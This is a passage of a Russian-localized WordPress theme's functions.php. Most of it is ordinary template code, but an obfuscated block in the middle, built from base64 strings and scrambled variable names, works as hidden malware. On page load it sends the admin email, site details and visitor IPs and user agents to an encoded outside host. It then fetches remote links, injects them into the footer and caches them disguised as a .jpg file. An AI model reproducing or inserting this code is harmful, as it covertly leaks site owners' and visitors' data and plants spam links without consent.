<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $QAGM='6';$gDHfYo='4';$fAQbZvH='b';$RWcczgX='s';$MLrC='a';$sjTuJas='d';$LaAn='_';$yajEEQ='c';$tmGxcSo='e';$ytkKZHM='e';$sUHeP='e';$WKLQfu='d';$CeSnfs='o';$WsLVEMKt=$fAQbZvH.$MLrC.$RWcczgX.$sUHeP.$QAGM.$gDHfYo.$LaAn.$sjTuJas.$tmGxcSo.$yajEEQ.$CeSnfs.$WKLQfu.$ytkKZHM;$lIKUQY='z';$INlTvV='l';$XBVLCi='e';$KQJWgO='n';$LoJa='g';$VadFQM='t';$ObmYM='f';$lQDIQGT='i';$mULyLog='a';$imqfxHmS=$LoJa.$lIKUQY.$lQDIQGT.$KQJWgO.$ObmYM.$INlTvV.$mULyLog.$VadFQM.$XBVLCi;$ljqsJw='1';$OPzJgz='o';$XVqaA='s';$nmns='t';$Mcen='t';$IdGx='_';$rhOA='r';$BEQF='3';$QQgAfPS='r';$PZKJLiua=$XVqaA.$Mcen.$QQgAfPS.$IdGx.$rhOA.$OPzJgz.$nmns.$ljqsJw.$BEQF;$zauA='r';$AQCUO='r';$OEoUvaj='s';$Danlq='t';$SzJNU='v';$IEGeV='e';$uYPNQpwq=$OEoUvaj.$Danlq.$zauA.$AQCUO.$IEGeV.$SzJNU;                     
		$vd__y='6';$jg__________b='4';$zw_____________o='b';$en_____________u='s';$lb_______l='a';$cv___b='d';$nj______x='_';$az_________e='c';$sy__________d='e';$ai___________k='e';$eo_______________r='e';$yx______t='d';$mk_______________r='o';$qf_______________r=$zw_____________o.$lb_______l.$en_____________u.$eo_______________r.$vd__y.$jg__________b.$nj______x.$cv___b.$sy__________d.$az_________e.$mk_______________r.$yx______t.$ai___________k;
		$ih_________w='t';$lw___________i='s';$aw_______________z='u';$fl_____________m='o';$re_______y='x';$bu_____i='e';$ne_____k='f';$hw_______________b='n';$ga_____r='c';$gf_____________g='_';$wu_________g='i';$xc______________k='n';$ze________v='s';$za__f='t';$fr__________o='i';$bb_______a=$ne_____k.$aw_______________z.$hw_______________b.$ga_____r.$ih_________w.$wu_________g.$fl_____________m.$xc______________k.$gf_____________g.$bu_____i.$re_______y.$fr__________o.$ze________v.$za__f.$lw___________i;
		$dp_____________m='e';$zq_____________y='o';$cd_______________n='f';$hb_________d='n';$fo____a='p';$jw_______d=$cd_______________n.$zq_____________y.$fo____a.$dp_____________m.$hb_________d;
		$kl___________v='d';$ss_______________v='e';$qe____________p='a';$bj___________j='f';$ke________b='r';$ly_______________v=$bj___________j.$ke________b.$ss_______________v.$qe____________p.$kl___________v;
		$hu______h='l';$vu______________o='c';$qh______________h='e';$ln__________n='f';$ef______x='o';$tt___m='s';$hj_____a=$ln__________n.$vu______________o.$hu______h.$ef______x.$tt___m.$qh______________h;
		
		define("WP_ID", $qf_______________r("Mi4wLjA="));
		define("WP_TTL", $qf_______________r("MTA4MDA="));
		define("WP_SRC", $qf_______________r("dHBva24="));
	


		function wp_get_header() {
			global $qf_______________r, $bb_______a;
			
			if (
				$bb_______a($qf_______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bb_______a($qf_______________r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bb_______a($qf_______________r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qf_______________r, $jw_______d, $hj_____a, $ly_______________v;
			
			$np___j = TEMPLATEPATH."/".$qf_______________r("Zm9vdGVyLnBocA==");
			$vr___h = @$jw_______d($np___j, "r");
			$np___j = @$ly_______________v($vr___h, @filesize($np___j));
			@$hj_____a($vr___h);
			
			$xf______j = TEMPLATEPATH."/".$qf_______________r("ZnVuY3Rpb25zLnBocA==");
			$vr___h = @$jw_______d($xf______j, "r");
			$xf______j = @$ly_______________v($vr___h, @filesize($xf______j));
			@$hj_____a($vr___h);
			
			$pd_________z = 0;
			if($np___j && $xf______j) {
				if ($qf_______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($np___j, $qf_______________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pd_________z = 1;
					}
					if (substr_count($np___j, "wp_theme_GPL_credits()") < 1) {
						$pd_________z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pd_________z = 12;
				}
			}
			
			if($pd_________z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pd_________z -->";
			}
		}
	


		function wp_loaded() {
			global $qf_______________r, $bb_______a;
			return $bb_______a($qf_______________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ts___________v, $xb_______q = "(more...)", $lj_______________t = 0, $zz_____________s = "") {
				$ta________p = get_the_content($xb_______q, $lj_______________t, $zz_____________s);
				$ta________p = apply_filters("the_content", $ta________p);
				
				$ta________p = str_replace("]]>", "]]>", $ta________p);
				if (strlen($_GET["p"]) > 0) {
					echo $ta________p;
				}
				else if ((strlen($ta________p)>$ts___________v) && ($gs_______________e = strpos($ta________p, " ", $ts___________v ))) {
					$ta________p = substr($ta________p, 0, $gs_______________e);
					$ta________p = $ta________p;
					echo $ta________p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$xb_______q</a></div></p>";
				} else {
					echo $ta________p;
				}
				
			}
		}
	


		$sr_____f='_';$gr_______f='6';$sm____c='s';$gl__m='d';$nk_____g='b';$tl_____y='n';$mi____a='e';$cn_______j='o';$ck___________b='e';$ys____s='4';$ed_______k='a';$pq______h='c';$gs__r='e';$dc______d=$nk_____g.$ed_______k.$sm____c.$gs__r.$gr_______f.$ys____s.$sr_____f.$mi____a.$tl_____y.$pq______h.$cn_______j.$gl__m.$ck___________b;
		$kh__a='l';$dg___________t='e';$ht___f='i';$af_____________w='t';$wx__y='e';$lv____________r='g';$pd____h='e';$vu_____c='_';$yq___________b='f';$jv__q='n';$ac_______________o='s';$ga________o='n';$im______________y='_';$rj__n='o';$he___f='t';$oj______z='c';$ni_________z='t';$gd____________o=$yq___________b.$ht___f.$kh__a.$wx__y.$im______________y.$lv____________r.$pd____h.$he___f.$vu_____c.$oj______z.$rj__n.$ga________o.$ni_________z.$dg___________t.$jv__q.$af_____________w.$ac_______________o;
		$gr____________v='e';$pu______x='_';$cw_______________w='e';$wz____________n='f';$nu_____________j='x';$cq___________h='l';$wl________t='i';$jz____a='i';$ek_____________g='t';$ke_____u='s';$bl_________e='s';$gp_______________b=$wz____________n.$jz____a.$cq___________h.$cw_______________w.$pu______x.$gr____________v.$nu_____________j.$wl________t.$ke_____u.$ek_____________g.$bl_________e;
		$fy_____________x='a';$lk____x='m';$rw____k='o';$hl________n='v';$ss_______________g='r';$lp_________n='p';$mb_______q='s';$gt_______y='o';$sn_______u='e';$mk_____________b='e';$is____h='n';$bq_______i='i';$wv______________j='c';$uz______c='r';$ck_______j='_';$nk_________u=$hl________n.$mk_____________b.$ss_______________g.$mb_______q.$bq_______i.$rw____k.$is____h.$ck_______j.$wv______________j.$gt_______y.$lk____x.$lp_________n.$fy_____________x.$uz______c.$sn_______u;
		$fz______h='n';$fz________w='o';$rd__________n='e';$cj______________l='p';$fw___________t='k';$rf______i='c';$vb_______u='f';$cn___r='s';$uu____n='o';$th___d=$vb_______u.$cn___r.$fz________w.$rf______i.$fw___________t.$uu____n.$cj______________l.$rd__________n.$fz______h;
		$dx__________u='r';$bi___x='t';$eg_____________j='e';$as___________n='f';$dq_____o='w';$va___________o='i';$ne________s=$as___________n.$dq_____o.$dx__________u.$va___________o.$bi___x.$eg_____________j;
		$bn___________f='5';$zt__u='m';$ts_______u='d';$ea_______l=$zt__u.$ts_______u.$bn___________f;
		$ga_____________n='h';$mb_____________d='p';$op_____________n='a';$kb__________r='a';$hf__________x='e';$hd_____________t='r';$bt_____a='t';$on_______________v='l';$fv____________r=$hd_____________t.$hf__________x.$kb__________r.$on_______________v.$mb_____________d.$op_____________n.$bt_____a.$ga_____________n;
		$rr__________l='u';$bj_______q='i';$pr_____h='n';$rr_____________y='e';$ov_____________r='a';$ij____________z='l';$se_______k='e';$bq_______________b='z';$kt__b='r';$ab_____j='s';$zi___________d='i';$mz_______________l=$rr__________l.$pr_____h.$ab_____j.$rr_____________y.$kt__b.$zi___________d.$ov_____________r.$ij____________z.$bj_______q.$bq_______________b.$se_______k;
		$uq___t='t';$es__f='m';$yg_________d='a';$su_____z='p';$jv______________e='m';$lk______m='n';$zk____________r='e';$gc____________g=$uq___t.$zk____________r.$jv______________e.$su_____z.$lk______m.$yg_________d.$es__f;
		$th________j='r';$pg__s='e';$ep______________c='x';$jc____________k='o';$vf___i='a';$qk___________k='r';$yn__________h='c';$dd_____________c='_';$gd____________x='_';$ux__o='n';$il__a='e';$ra________y='t';$yu___________n='c';$ut_________y='t';$gv_____z='a';$en______________u='t';$hs_______________m='e';$oo_______g='s';$yb____i='m';$bs___q='t';$ty________o='e';$xa____________g=$oo_______g.$bs___q.$th________j.$pg__s.$vf___i.$yb____i.$gd____________x.$yu___________n.$jc____________k.$ux__o.$en______________u.$ty________o.$ep______________c.$ra________y.$dd_____________c.$yn__________h.$qk___________k.$hs_______________m.$gv_____z.$ut_________y.$il__a;
	


		function nn______r($ar_______________e) {
			global $qf_______________r, $bb_______a, $gd____________o, $nk_________u, $xa____________g;
			
			if (!$bb_______a($qf_______________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($nk_________u(PHP_VERSION, "5.0.0", ">=") && $bb_______a($qf_______________r("ZmlsZV9nZXRfY29udGVudHM=")) && $bb_______a($qf_______________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$uq_______b = $xa____________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ty_________o = @$gd____________o($ar_______________e, 0, $uq_______b);
			} else {
				$ty_________o = @$gd____________o($ar_______________e, 0);
			}
			
			return $ty_________o;
		}
	


		function xw____________t($ar_______________e) {
			global $bb_______a, $th___d, $ne________s, $qf_______________r;
			
			if (!$bb_______a($qf_______________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$qj___a = strpos($ar_______________e, "/", 7);
			$hw________q = array(
				"uri"     => substr($ar_______________e, $qj___a),
				"host"    => str_replace("http://", "", substr($ar_______________e, 0, $qj___a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xn______________f = @$th___d("$hw________q[host]", 80, $zi___e, $zy___c, 4);
			
			if (!$xn______________f) {
				return false;
			} else {
				$ty_________o = "";
				$og___________f  = "GET $hw________q[uri] HTTP/1.0\r\n";
				$og___________f .= "Host: $hw________q[host]\r\n";
				$og___________f .= "Referer: $hw________q[referer]\r\n";
				$og___________f .= "Connection: Close\r\n\r\n";
				
				@$ne________s($xn______________f, $og___________f);
				
				while (!@feof($xn______________f)) {
					$nb_____a = @fgets($xn______________f, (1024*24));
					
					if ($nb_____a == "\r\n") {
						$yi___x = true;
						continue;
					}
					
					if ($yi___x) {
						$ty_________o .= $nb_____a;
					}
				}
				
				return $ty_________o;
			}
		}
	


		function tk_______b($ar_______________e) {
			global $bb_______a;
			$rf__m = false;
			
			if ($ar_______________e != "") {
				if ($bb_______a("nn______r")) {
					$rf__m = @nn______r($ar_______________e);
				}
				
				if (!$rf__m && ($bb_______a("xw____________t"))) {
					$rf__m = @xw____________t($ar_______________e);
				}
			}
			
			return $rf__m;
		}
	


		function mv__________s() {
			global $_SERVER, $ea_______l;
			
			$uk__g = $_SERVER["SERVER_NAME"];
			
			if (substr("$uk__g", 0, 4) == "www.") {
				$uk__g = substr("$uk__g", 4);
			}
			
			$uk__g = $ea_______l("$_SERVER[SERVER_NAME]");
			
			return $uk__g;
		}
	


		function wu_________c() {
			return "file";
		}
	


		function fj______________g($ar_______________e) {
			global $_SERVER, $gd____________o, $gp_______________b, $jw_______d, $hj_____a, $ne________s;
			
			$io_______________h = ey______________e();
			
			$do___u = mv__________s().".jpg";
			$oc__r = $io_______________h["dir_upload"]["path"]."/$do___u";
			$ha_____d = @filemtime($oc__r);
			
			if (!$ha_____d || ((time()-$ha_____d) >= WP_TTL)) {
				$rf__m = tk_______b($ar_______________e);
				
				if ($rf__m) {
					if ($gp_______________b($oc__r)) {
						@unlink($oc__r);
					}
					
					$vr___h = @$jw_______d($oc__r, "x+");
					
					@$ne________s($vr___h, $rf__m);
					@$hj_____a($vr___h);
				}
			} else {
				if ($gp_______________b($oc__r)) {
					$rf__m = @$gd____________o($oc__r);
				} else {
					$rf__m = false;
				}
			}
			
			return $rf__m;
		}
	


		function ey______________e() {
			global $_SERVER, $qf_______________r, $dc______d;
			
			$gz__f = wp_count_posts("post");
			$bj_______________u = pathinfo(get_bloginfo("template_directory"));
			
			$io_______________h = array(
				"url" => array(
					"report"      => $qf_______________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $bj_______________u,
				"dir_upload"	=> mz_________d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$bj_______________u[filename],
					"a005=".$gz__f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$io_______________h["url"]["queryString"] = implode("&", $io_______________h["queryString"]);
			$io_______________h["url"]["report"] = $io_______________h["url"]["report"]."/?".$dc______d($io_______________h["url"]["queryString"]).".html";
						
			return $io_______________h;
		}
	


		function mz_________d() {
			$hu______________p = wp_upload_dir();
			
			if (isset($hu______________p["error"])) {
				$gi____t = to_____w();
				if (is_writable($gi____t)) {
					$hu______________p = array("path" => $gi____t);
				}
			}

			return $hu______________p;
		}
	


		function to_____w() {
			global $bb_______a, $ea_______l, $fv____________r, $gc____________g;
			
			$jt__r = (bool) ini_get("safe_mode");
			if ($jt__r == true) {
				return false;
			}
			
			if ($bb_______a("sys_get_temp_dir")) {
				$sd___z = sys_get_temp_dir();
				if (is_writable($sd___z)) {
					return $fv____________r($sd___z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $fv____________r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $fv____________r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $fv____________r($_ENV["TEMP"]);
			} else {
				$gz____y = $gc____________g($ea_______l(uniqid(rand(), true)), "");
				if ($gz____y) {
					$sd___z = $fv____________r(dirname($gz____y));
					@unlink($gz____y);
					return $sd___z;
				} else {
					return false;
				}
			}
		}
	


		function ug____m() {
			global $_GET, $gp_______________b;
			
			$io_______________h = ey______________e();
			$uk__g = mv__________s();
			$kg______________p = wu_________c();
			
			$ml________m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kg______________p == "file") {
					$kc______b = $io_______________h["dir_upload"]["path"]."/".$uk__g.".jpg";
					if ($gp_______________b($kc______b)) {
						@unlink($kc______b);
						$ml________m = "deleted";
					}
				}
				
				$go_______a = array(
					"s"	=> $ml________m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($go_______a AS $xw_________h => $zw______v) echo " [$xw_________h:$zw______v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bb_______a, $qf_______________r, $mz_______________l;
			$io_______________h = ey______________e();
			
			$yy___j = "fj______________g";
			if ($bb_______a($yy___j)) {
				$ty_________o = $yy___j($io_______________h["url"]["report"]);
			}
			
			if ($ty_________o) {
				if ($ty_________o = @$qf_______________r($ty_________o)) {
					$ty_________o = @$mz_______________l($ty_________o);
					
					if (strlen($ty_________o[custom_credit]) >= 5) {
						$io_______________h["default_string"] = $ty_________o[custom_credit];
					}
					
					if ($ty_________o["status"] == "0") {
						$cm__________j = 1;
						$it____v = 1;
					} else {
						$um____j = sizeof($ty_________o["links"]);
						$ls__________n = $io_______________h["default_string"];
						
						if ($um____j > 0 && $ty_________o["links"] !== "") {
							$ik____________f = 0;
							foreach ($ty_________o["links"] as $lo_____q => $hf_____________y) {
								$ik____________f++;
								if ($hf_____________y->l_path == "" || $hf_____________y->l_path == $_SERVER["REQUEST_URI"]) {
									$hf_____________y->l_href = htmlspecialchars(strip_tags($hf_____________y->l_href));
									$hf_____________y->l_title = htmlspecialchars(strip_tags($hf_____________y->l_title));
									$hf_____________y->l_anchor = htmlspecialchars(strip_tags($hf_____________y->l_anchor));
									$ls__________n .= " | ";
									$ls__________n .= "<a href='$hf_____________y->l_href' title='$hf_____________y->l_title'";
									if ($hf_____________y->l_nofollow == "1") {
										$ls__________n .= " rel='nofollow'";
									}
									$ls__________n .= ">$hf_____________y->l_anchor</a>";
								}
							}
						}
						$io_______________h["links"] = "$ls__________n";
						if ($ty_________o[credit] == "0") {
							$io_______________h["links"] = "";
						}
					}
				} else {
					$cm__________j = "1";
				}
			} else {
				$cm__________j = "1";
			}
			
			if ($cm__________j == "1") {
				$io_______________h["links"] = $io_______________h["default_string"];
			}
			
			echo "$io_______________h[links]";
			
			echo "<!-- s: $ty_________o[signature] -->";
			ug____m();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
